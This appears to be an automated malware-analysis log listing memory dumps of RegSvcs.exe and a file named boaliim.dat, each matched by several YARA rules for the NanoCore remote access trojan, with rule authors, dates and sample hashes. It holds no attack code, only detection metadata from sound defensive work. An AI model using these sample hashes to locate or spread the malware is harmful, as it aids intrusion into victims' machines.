Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
